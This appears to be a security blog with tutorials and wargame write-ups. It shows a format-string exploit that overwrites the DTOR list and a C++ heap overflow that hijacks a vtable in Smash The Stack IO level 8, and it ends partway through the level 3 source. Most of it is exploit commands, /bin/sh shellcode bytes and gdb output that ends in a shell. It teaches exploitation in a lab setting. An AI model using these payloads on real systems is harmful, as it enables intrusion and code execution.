Format String Vulnerabilities

In many programming languages, the preferred way to deal with printing strings is through the use of format strings.  Format strings allow for the parsing of strings containing an arbitrary number of mixed data type parameters.  However, due to implementation details in certain languages such as C and C++, certain uses of functions which rely on format strings may make programs vulnerable to exploits.  This type of vulnerability can lead to exploitation which reads arbitrary memory locations, or even writes to arbitrary memory locations (such as the return address).  As such, format string vulnerabilities are an important security concern and should be something which all programmers watch out for.

To better understand format strings, let’s take a look at a sample program that makes use format strings.  The program we’re going to look at is simple: It has one, 512 byte character array called buf and upon running uses strncpy to copy the first 511 bytes from argv[1] into the buf array.  After strncpy has finished, printf is called on buf, and finally the program returns 0.  Here’s the code:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
char buf[512];
strncpy(buf, argv[1], sizeof(buf) – 1);

printf(buf);

return 0;
}

Looking at the code, it should be clear that printf is the function which makes use of format strings.  In this use, printf(buf), buf is treated as a format string.  Format strings are evaluated with a special format function.  This function parses the string passed to it, and replaces certain control characters with variables from the stack.  For example, if one wanted to print the value of the integer variable i, they might use the following:

printf(“Value of integer i: %d”, i);

Format string control characters are actually sets of characters, but they all start with a %.  Since the format function needs to be able to parse format strings with any number of control characters, it simply assumes each control character belongs to a parameter which was passed via the stack.  While this assumption holds true in examples such as the integer printing example above, it doesn’t always hold in situations such as that in our program using printf(buf).  Our printf(buf) example will work fine, and the string contents of buf will be printed to the screen, under one condition.  This condition is that the string buf does not contain anything which might be interpreted as a control character.  If buf does contain control characters, the format function will treat them as valid control characters and perform the corresponding action such as reading an integer from the stack.  This ends up being a security vulnerability in that format strings allow for both reading and writing data, and if the stack hasn’t been initialized in the manner expected given the format string/control characters, then the data read/written can end up being arbitrary and end up causing unintended results.

To see an example of this vulnerability, let’s attempt to run our program and cause it to print the hex values held at the start of our string.  To do this, let’s first look at the stack.  Prior to printf being called, the “top” of the stack looks roughly like this:

[buf][argv][argc][spf][ra]

From here the printf function will be called, which will add to the top of the stack, thus we’ll have to to pop off a bit of data before we can get to our string.  To pop values off the stack, we can use the %x control character.  This control reads a 32 bit unsigned hex value from the stack.  So, let’s make a few attemps at running the program with the format control characters to read a hex value from the stack:

s9ghost@localhost:/tmp/.fsv$ ./test AAAABBBB.%x.%x.%x.%x.%x.%x.%x.%x
AAAABBBB.bfffde8d.1ff.10.7.bfffdae8.b29ce5.41414141.42424242

What is all this?  Well, like we said, we’d have to use a few extra reads to move through some extra data on the stack from the call to printf.  However, upon the 7th and 8th reads, we found hex values which correspond to the AAAABBBB sequence at the start of our string.  A deeper reason to why we’re able to read the value there is that the control character %x expects a 32 bit int, which would be placed by value onto the stack.  Other control characters, such as %s which gets a null terminated string, perform slightly differently.  Since strings aren’t passed by value but instead by reference, the value on the stack is a pointer to a string.  Thus, if we use the control character %s, the value on the stack will be used as a pointer, and that location is where a string will be read from.  This results in another way to read from memory, and in fact let’s us read strings from any arbitrary memory location if we can control what is next on the stack.

Well, since in the above example we were able to use %x to move to the start of our format string, let’s try writing a valid memory location at the start of our string and use the %s control character to de-reference that location and print the string stored there.  First, though, we need a memory location that’ll work.  For this exercise let’s assume we have the following string at 0xbfffdeb0: “TERM=xterm”.  Next, we can write the address in little-endian due to our architecture.

s9ghost@localhost:/tmp/.fsv$ ./test `perl -e ‘print “\xb0\xde\xff\xbf”,”AAAABBBB.%x.%x.%x.%x.%x.%x.%s”‘`
°Þÿ¿AAAABBBB.bfffde8c.1ff.10.7.bfffdae8.2c0ce5.RM=xterm

Now you can see that with that use of %x to move our provided string to the front of the stack, and having an address at the front of our string, and using a control character which de-references, we can read from any arbitrary memory location.  However, format strings contain even more control characters than the ones we’ve seen here.  Specifically, the %n control allows writing to a variable, and it is through this which format string vulnerabilities can also result in writing to arbitrary memory locations.

The %n control character is used to store the number of characters written so far into a variable.  Like all control characters, it uses a value from the stack, however since it stores an int into a variable, it expects the address of this variable to be on the stack.  Thus, since we know we can supply values to the stack, if we can also control how many characters we’ve read, we might be able to overwrite an important area of memory.  The careful thinker may have picked up on something at this point:  If we need to write more to increase the value we’ll store with %n, won’t that move us past our stack location if we need to use more %x or any other read control?  While this is true, writing and reading aren’t the same.  Specifically, the %x control allows for formatting options, such as padding, which will write characters regardless of what was read.  To pad a number, we simply tell %x how many characters we want the result to be.  For an example, let’s look at this modified use of the %x control character.

s9ghost@localhost:/tmp/.fsv$ ./test `perl -e ‘print “\xb0\xde\xff\xbf”,”AAAABBBB.%x.%x.%05x.%05x.%x.”‘`
°Þÿ¿AAAABBBB.bfffde8d.1ff.00010.00007.bfffdae8.

Looking at the 3rd and 4th %x, we can see the addition of 05.  The leading 0 designates that the value printed will be zero-padded, and the 5 specifies that at least 5 characters will be printed.  This result is seen in the “00010” and “00007” that was printed instead of simply “10” or “7” as we saw in the previous example without the padding options.  Thus, it is through this zero-padding that we can increase the number of bytes printed without using additional control characters and altering the stack.  Now let’s attempt to re-write some memory.  Let’s assume we’ve found the following memory location containing the following string:

(gdb) x/1s 0xbfffdedf
0xbfffdedf: “example=aaaa”
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61

To write to memory, our format string starts out similar to reading, in fact lets read just to make sure we’re positioned correctly on the stack:

s9ghost@localhost:/tmp/.fsv$ ./test `perl -e ‘print “\xd1\xde\xff\xbf”,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%s”‘`
ßÞÿ¿AAAABBBB.bfffde7b.1ff.00010.00007.bfffdac8.51ece5.example=aaaa

So far, so good.  Now if we use the %n control character instead of %s, we should be able to write to the address on the stack, instead of reading to it.  Let’s go a head and do that using gdb so that we can place a couple breakpoints before and after printf to pause the program and check the values in memory to verify our results:

(gdb) run `perl -e ‘print “\xd9\xde\xff\xbf”,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n”‘`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x36 0x00 0x00 0x00
(gdb) cont
Continuing.

ÙÞÿ¿AAAABBBB.bfffde6d.1ff.00010.00007.bfffdaa8.ec5ce5.
Program exited normally.

At this point we’ve proven that we can write to any specific memory address.  We also know we can pad some of our reads and change the value which we can write to memory.  However, how well would this work if we wanted to write say, a memory address of some shellcode to an arbitrary memory location (like the return address or some other executable place)?  Well, if we wanted to write a memory location, for example 0xbfffa00a, this would mean padding on the size of within anywhere from a few hundred million to a few billion.  This is far too large to effectively pad.  However, what we can do is chain four small writes of one byte at a time together in a row in an attempt to overwrite an address.

To chain together writes, we’re going to have to place four memory locations onto the stack via our format string.  We must also, obviously, supply additional %n control characters.  Let’s check out an example:

(gdb) run `perl -e ‘print “\xd9\xde\xff\xbf”, “\xda\xde\xff\xbf”, “\xdb\xde\xff\xbf”, “\xdc\xde\xff\xbf”, “AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%n.%n.%n”‘`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/16xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61 0x00 0x53 0x53 0x48
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/16xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x42 0x43 0x44 0x45 0x00 0x00 0x00 0x48

Now we’ve seen that we can control a full 32 bits of memory.  The theory and details of format string vulnerabilities have been verified.  However, to show the severity of format string vulnerabilities, let’s see if we can cause arbitrary code execution.

To cause code execution, we’re going to have to overwrite some area of memory with the address of the code we want executed.  While we could potentially try to write to the return address on the stack frame, another option would be to take advantage of how C handles constructors and destructors.  All C programs, whether they have valid constructors or destructors defined or not, have portions of code defined as constructor and destructor lists.  If a program doesn’t specify it’s own, these lists will remain empty.  The destructor list, for example, works by holding pointers to valid destructor functions.  Thus, if we want to cause code execution we can do it by appending the address of the code we want to execute to the end of the destructor list and it will be run when the destructor is called.  To write to the end of the destructor list, we’re going to need to know where it is.  Luckily we can check this with the nm command as follows:

s9ghost@localhost:/tmp/.fsv$ nm ./test | grep DTOR
08049510 D __DTOR_END__
0804950c d __DTOR_LIST__

Since we need to write to the end of the list, we need to write to memory location 0x08049510.  Let’s use that address as a base, and see if we can construct a format string which will overwrite it, similar to what we did above.  Then let’s hit break points and examine the memory location to make sure it worked.

(gdb) run `perl -e ‘print “\x10\x95\x04\x08”, “\x11\x95\x04\x08”, “\x12\x95\x04\x08”, “\x13\x95\x04\x08”, “AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%n.%n.%n”‘`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x42 0x43 0x44 0x45 0x00 0x00 0x00 0x00

Now that we’ve got our format string overwriting the DTOR, the final thing we need to do is determine how to make our string write the values we need in order to represent the address of our arbitrary code.  However, before doing that, we need to place some code into memory.  Let’s use some linux shellcode we got from packetstorm which will spawn a shell.  Let’s also pad it with many no-ops at the beginning so we can be a little more lenient about which memory address we choose.  (This is just for ease, it’s not necessary and probably not a good idea in actual environments and NOP-padding may trigger an IDS.)  To place our shellcode in memory, we can assign it to an environmental variable, we’ll use the variable SHELLCODE.

s9ghost@localhost:/tmp/.fsv$ export SHELLCODE=`perl -e ‘print “\x90″x5000,”\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘`

Now that our shellcode in placed in memory, let’s write a a small C program to get the address of our environmental variable holding our shellcode.  This program and it’s use are shown next:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf(“%#x\n”, getenv(argv[1]));
return 0;
}

s9ghost@localhost:/tmp/.fsv$ ./getmem SHELLCODE
bfffcaf8

Now we have our code in memory, and we know where in memory.  So if we can jump to any memory location in the NOP padding of our shellcode, which is located at the first 5000 bytes starting at 0xbfffcaf8, we should be execute our shellcode.

Finally, let’s determine how much padding we need to write between uses of %n to correctly overwrite DTOR with our shellcode memory location.  Remember that address are in memory in little-endian format and thus start with the lower bits furthest to the left.  First, let’s re-write our format string adding %x controls between our %n’s so we can change the value written by each.  We should also see what value is written by each %n and how much we need to alter their padding to get the results we want:

(gdb) run `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%08x.%n.%08x.%n.%08x.%n”‘`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0x58 0x62 0x6c 0x00 0x00 0x00 0x00

DTOR was correctly overwritten.  Let’s look at the values.  Well, since we have a large memory range of NOPs to jump to, we can leave the first 0x4e value alone as it’s the least significant byte.  However based on the memory address we want to jump to, it looks like we’re going to have to change the second byte.  Since we want to jump to somewhere in the range of 5000 bytes higher than 0xbfffcaf8, let’s just try for 0xcb in the second byte of DTOR.  To do this, we’re going to have to pad the difference between the already assigned value, 0x58, and the value we want, 0xcb.  Doing some math we see that 0xcb – 0x58 = 0x73, which is 115 decimal.  Also, since we had 08 padding before, let’s add 8 more for a final value of 123 padding.  Let’s attempt this and check the value written again to make sure it works:

(gdb) run `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%08x.%n.%08x.%n”‘`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/.fsv/test `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%08x.%n.%08x.%n”‘`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xd5 0xdf 0x00 0x00 0x00 0x00

As you can see, it’s working.  We’ve now written 0xcb to the second byte of DTOR.  Next, we want to write 0xff to the third byte.  Let’s take the same approach as before.  With the math, 0xff – 0xd5 = 0x2a, which is 42 decimal, and again add 8 for what we already padded for a final padding of 50.  Let’s test it again:

(gdb) run `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%08x.%n”‘`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/.fsv/test `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%08x.%n”‘`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xff 0x09 0x01 0x00 0x00 0x00

Alright, one more byte to go.  As you can see, the byte value changes as what we’ve done changes.  The most recent value for the 4th byte is now 0x09.  Let’s do our math again, 0xbf – 0x09 = 0xb6, which is 182 decimal, adding 8 more for previous padding gives 190 total padding.  Let’s put this in, check our values, and see what happens when the program finishes:

(gdb) run `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%0190x.%n”‘`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/4xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/4xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xff 0xbf
(gdb) cont
Continuing. abcabcabcAAAABBBB.bfffca89.1ff.00010.00007.bfffc6c8.5d9ce5..000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064636261..00000000000000000000000000000000000000000064636261..0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064636261.
sh-4.1$

There we have it, a format string exploited to provide a shell.

Over the years, the format string landscape has changed.  Many compilers now offer options to provide security against certain format string attacks, such as DTOR.  However, other ways of exploiting format string vulnerabilities exist and continue to be developed.  We will talk about other format string exploit options, such as writing to PLT/GOT or a stack Return Address, in future postings.  Being able to read and write indiscriminately to and from memory is a major security flaw, and it is through this flaw that format string vulnerabilities make their mark on the computer security landscape.

Posted in Uncategorized | Tagged , | Leave a comment

IO Level 8 – Buffer/Heap Overflow in C++

Today we’re going to be looking at level 8 of the IO wargame, hosted on the Smash The Stack Network.  As always, the password at the end of the level will be stripped and replaced with Y’s.  So without further adieu, let’s get started.  If you want to follow a long at home (which I highly recommend), ssh into blowfish as level8 with the password from completing level 7.

Once logged in, let’s go a head and see what files we’ll be working with today.  A quick ls of the /levels directory shows two files, level08 and level08.cpp.  This is neat, our first level in C++!  Why don’t we look at the source first:

level8@io:~$ more /levels/level08.cpp
// writen by bla for io.smashthestack.org
#include <iostream>
#include <cstring>

class Number
{
public:
Number(int x) : number(x) {}
void setAnnotation(char *a) {memcpy(annotation, a, strlen(a));}
virtual int operator+(Number &r) {return number + r.number;}
private:
char annotation[100];
int number;
};
int main(int argc, char **argv)
{
if(argc < 2) _exit(1);

Number *x = new Number(5);
Number *y = new Number(6);
Number &five = *x, &six = *y;

five.setAnnotation(argv[1]);

return six + five;
}

Next, let’s focus on the Number class.  This class has two private local variables.  One is a char array called annotation, the other is an int called number.  This class also has three public functions.  The first is the constructor which takes one argument, an int, and assigns it’s value to the private local variable “number”.  The second function is called setAnnotation and it takes a char pointer, “a”, as it’s only argument.  Finally the third is a virtually overloaded + operator for the Number class.

Looking at the implementation of the setAnnotation function, we can see something that doesn’t look well programmed from a security perspective.  This function uses memcpy to write the bytes starting at the memory location pointed to by “a”, the function’s argument, to the memory locations starting at “annotation”. It also uses the length of the string “a” as the number of bytes to write.  While it’s good that strlen is used to provide a number of bytes to copy, it should have been limited by the length of “annotation”, not simply “a”.  Since we can control a’s value, and subsequently it’s length, we can overflow the annotation buffer, and cause changes to the heap.

To get a good understanding of what’s happening in the program, let’s go a head and load up gdb and disassemble main.  The following is main with line comments:

(gdb) disass main
Dump of assembler code for function main:
0x08048694 <main+0>: push %ebp
0x08048695 <main+1>: mov %esp,%ebp
0x08048697 <main+3>: and $0xfffffff0,%esp
0x0804869a <main+6>: push %ebx
0x0804869b <main+7>: sub $0x2c,%esp
0x0804869e <main+10>: cmpl $0x1,0x8(%ebp) –if(argc < 2)
0x080486a2 <main+14>: jg 0x80486b0 <main+28> —
0x080486a4 <main+16>: movl $0x1,(%esp) —
0x080486ab <main+23>: call 0x804857c <_exit@plt> — _exit(1);
0x080486b0 <main+28>: movl $0x6c,(%esp) –0x6c = 108
0x080486b7 <main+35>: call 0x80485bc <_Znwj@plt> –new operator(unsigned int) annotation, number, this pointerfor number (allocates memory)(c++ variable x)
0x080486bc <main+40>: mov %eax,%ebx –save new address in ebx
0x080486be <main+42>: mov %ebx,%eax –reload to eax
0x080486c0 <main+44>: movl $0x5,0x4(%esp) –value 5 onto callstack as parameters
0x080486c8 <main+52>: mov %eax,(%esp) –address of number
0x080486cb <main+55>: call 0x804879e <_ZN6NumberC1Ei> –call constructor <Number::Number(int)>
0x080486d0 <main+60>: mov %ebx,0x10(%esp) –move old new operator address from ebx to stack
0x080486d4 <main+64>: movl $0x6c,(%esp) –move value of 108 into near end of stack pointer
0x080486db <main+71>: call 0x80485bc <_Znwj@plt> –new operator(unsigned int) annotation, number, this pointerfor number (allocates memory)(c++ variable y)
0x080486e0 <main+76>: mov %eax,%ebx –save new2 address in ebx
0x080486e2 <main+78>: mov %ebx,%eax –reload to eax
0x080486e4 <main+80>: movl $0x6,0x4(%esp) –value 6 onto callstack as parameters
0x080486ec <main+88>: mov %eax,(%esp) –new 2 address on callstack as parameters
0x080486ef <main+91>: call 0x804879e <_ZN6NumberC1Ei> –call constructor <Number::Number(int)>
0x080486f4 <main+96>: mov %ebx,0x14(%esp) –move old new2 operator address (memory address of new2) from ebx to stack (c++ variable y)
0x080486f8 <main+100>: mov 0x10(%esp),%eax –move old new address (c++ variable x) into eax
0x080486fc <main+104>: mov %eax,0x18(%esp) –move old new address from eax to the stack (assigning value to the reference variable five)
0x08048700 <main+108>: mov 0x14(%esp),%eax –move old new2 address (c++ variable y) into eax
0x08048704 <main+112>: mov %eax,0x1c(%esp) –move old new2 address from eax to the stack (assigning value to the reference variable six)
0x08048708 <main+116>: mov 0xc(%ebp),%eax –load address argv into eax
0x0804870b <main+119>: add $0x4,%eax –add 4 bytes to make up for argv[1] into array
0x0804870e <main+122>: mov (%eax),%eax —
0x08048710 <main+124>: mov %eax,0x4(%esp) –move char pointer of the first argument onto the stack
0x08048714 <main+128>: mov 0x18(%esp),%eax –load the address stored in the five variable into eax (its the address of our x structure in memory)
0x08048718 <main+132>: mov %eax,(%esp) –move the address from eax onto the stack
0x0804871b <main+135>: call 0x80487b6 <_ZN6Number13setAnnotationEPc> –Call to Number::setAnnotation(char*)
0x08048720 <main+140>: mov 0x1c(%esp),%eax –move address of six structure to eax
0x08048724 <main+144>: mov (%eax),%eax –dereference it and put it’s value in eax
0x08048726 <main+146>: mov (%eax),%edx –dereference what was the first 4 bytes of the structure and put that in edx (will function call it later, it must be a function)
0x08048728 <main+148>: mov 0x18(%esp),%eax –move address of five structure to eax
0x0804872c <main+152>: mov %eax,0x4(%esp) –move address of five as parameter on stack for call
0x08048730 <main+156>: mov 0x1c(%esp),%eax –move address of six structure into eax
0x08048734 <main+160>: mov %eax,(%esp) –move address of six as parameter on stack for call
0x08048737 <main+163>: call *%edx –call the address held in edx as a function
0x08048739 <main+165>: add $0x2c,%esp
0x0804873c <main+168>: pop %ebx
0x0804873d <main+169>: mov %ebp,%esp
0x0804873f <main+171>: pop %ebp
0x08048740 <main+172>: ret
End of assembler dump.

So analyzing the above we can assume our stack frame looks like:

0x1c   0x18 0x14 0x10 0xc   0x8
[&six][&five][*y][*x][argv][argc][sfp][ra]

So let’s throw a break at 0x0804871b <main+135>: call 0x80487b6 <_ZN6Number13setAnnotationEPc> –Call to Number::setAnnotation(char*) And check out the stack.

Breakpoint 1, 0x0804871b in main ()
(gdb) x/32xb $esp
0xbfffdca0: 0x08 0xa0 0x04 0x08 0x96 0xde 0xff 0xbf
0xbfffdca8: 0xd8 0xdc 0xff 0xbf 0x29 0x88 0x04 0x08
0xbfffdcb0: 0x08 0xa0 0x04 0x08 0x78 0xa0 0x04 0x08
0xbfffdcb8: 0x08 0xa0 0x04 0x08 0x78 0xa0 0x04 0x08

Looking at main’s assembly we can see that at this point in execution, esp+4 holds the address of the start of argv[1].  Also, esp holds the address that we’re going to write to (aka the address of the annotation array of the structure refered to by the variable five).   The structure of this address shows us that it isn’t in the same place in memory as all the 0xbfff—- addresses.  This 0x0804—- area, it turns out, is the heap.  The heap is similar to the stack and is used when a program needs to dynamically allocate more memory. In our program today, that happened when the “new” command was used to create two instances of the Number class, and is why they reside in the heap.

Examining the stack some more, we can find the values stored in both reference variables five and six.  They are located at +0x18 and +0x1c on the stack respectively from $esp.  Thus, we can see our Number instances are located at 0x0804a008 and 0x0804a078.  It is important to remember that with the heap, memory addresses grow up, unlike with the stack, which is why “six” is at a larger memory address than “five”.

Next, let’s go a head and look at the memory that represents one of our instances.  Let’s check out instance “six”:

(gdb) x/108xb 0x0804a078
0x804a078: 0xc8 0x88 0x04 0x08 0x00 0x00 0x00 0x00
0x804a080: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a088: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a090: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a098: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0a0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0a8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0b0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0b8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0c0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0c8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0d0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0d8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0e0: 0x06 0x00 0x00 0x00

There are three things to note about this memory.  Let’s start from the bottom and notice that the int value “number” is stored at the end (notice the int value 6).  Next we see the memory which is allocated for the 100 byte character array.  Finally, at the very top of the structure, we see 4 bytes which look an awful lot like a memory address.  The reason is because it is!  Let’s look at the address and see if we can tell what it is:

(gdb) disass 0x080488c8
Dump of assembler code for function _ZTV6Number:
0x080488c0 <_ZTV6Number+0>: add %al,(%eax)
0x080488c2 <_ZTV6Number+2>: add %al,(%eax)
0x080488c4 <_ZTV6Number+4>: aam $0xffffff88
0x080488c6 <_ZTV6Number+6>: add $0x8,%al
0x080488c8 <_ZTV6Number+8>: loop 0x8048851 <__libc_csu_init+65>
0x080488ca <_ZTV6Number+10>: add $0x8,%al

From the assembly of this function it may not be directly clear what it is.  But looking at when it’s called in main, we can decern that it is the virtual table for the virtual functions of the number class.  Also, looking back at the assembly of main, we can see that the virtual table accessed is that of the “six” structure.  Since the buffer we can overflow is that of “five”, if we overflow the bytes in the “six” structure which point to the virtual table with the address of a function we want to execute, we should be able to hijack execution. (Almost.  Since the v-table has another level of links we’ll have to add another level of de-referencing)

So, counting up the memory locations, we can see that there are 108 bytes between the start of “annotation” in “five” and the start of the six structure, where the v-table pointer is.  Thus, we’ll need to overflow the annotation buffer with 108 bytes, then 4 more bytes to overwrite the function pointer of “six”.  To make sure this is correct, let’s test it in gdb and drop a breakpoint to check the values again:

(gdb) run `perl -e ‘print “A”x108,”BBBB”‘`
Starting program: /levels/level08 `perl -e ‘print “A”x108,”BBBB”‘`

Breakpoint 1, 0x08048724 in main ()
(gdb) i r
eax 0x804a078 134520952
ecx 0x0 0
edx 0x0 0
ebx 0x804a078 134520952
esp 0xbfffdc30 0xbfffdc30
ebp 0xbfffdc68 0xbfffdc68
esi 0x0 0
edi 0x0 0
eip 0x8048724 0x8048724 <main+144>
eflags 0x200202 [ IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/8xb 0x0804a078
0x804a078: 0x42 0x42 0x42 0x42 0x00 0x00 0x00 0x00

Perfect.  Now we just need to overwrite this pointer with a valid memory location, perhaps that of some shellcode.  Since we know the address of the annotation buffer in five, let’s try hosting our shellcode there.

(gdb) run `perl -e ‘print “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”,”A”x56,”\x10\xa0\x04\x08″‘`

Starting program: /levels/level08 `perl -e ‘print “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”,”A”x56,”\x10\xa0\x04\x08″‘`

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()

Woops, not quite right.  Forgot about a dereference for the v-table.  To make up for that, we can simply replace the 4 NOPs at the beginning of our string with the address 4 bytes deeper in the NOP padding, using them as a pointer instead of a sled.

(gdb) run `perl -e ‘print “\x10\xa0\x04\x08\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”,”A”x56,”\x0c\xa0\x04\x08″‘`
Starting program: /levels/level08 `perl -e ‘print “\x10\xa0\x04\x08\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”,”A”x56,”\x0c\xa0\x04\x08″‘`

Executing new program: /bin/bash
sh-4.1$

There we have it.  While programs can use memory from either the stack or the heap, buffer overflows still allow attackers to overwrite memory, which may compromise the security and integrity of the programs.

Posted in IO, Smash The Stack, Wargames | Tagged , , , , , | 4 Comments

IO Level 3 – Function Pointers

Welcome back.  Today we’re going to be looking at the IO wargame from Smash The Stack.  Specifically, we will be looking at level 3.  If you’re interested in following along, go a head and ssh into IO as level3 with the password you got from completing level2.

Once in, we should check the /levels directory as that is where the executables for this wargame reside.  Upon doing this we can see two files, an executable called level03 and a file called level03.c.  Let’s look at the C file and see if we can find something to exploit:

level3@io:~$ more /levels/level03.c
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int good(int addr) {
printf(“Address of hmm: %p\n”, addr);
}

int hmm() {
printf(“Win.\n”);
execl(“/bin/sh”, “sh”, NULL);
}

extern char **environ;

int main(int argc, char **argv) {

int i, limit;

for(i = 0; environ[i] != NULL; i++)
memset(environ[i], 0x00, strlen(environ[i]));

int (*fptr)(int) = good;
char buf[32];

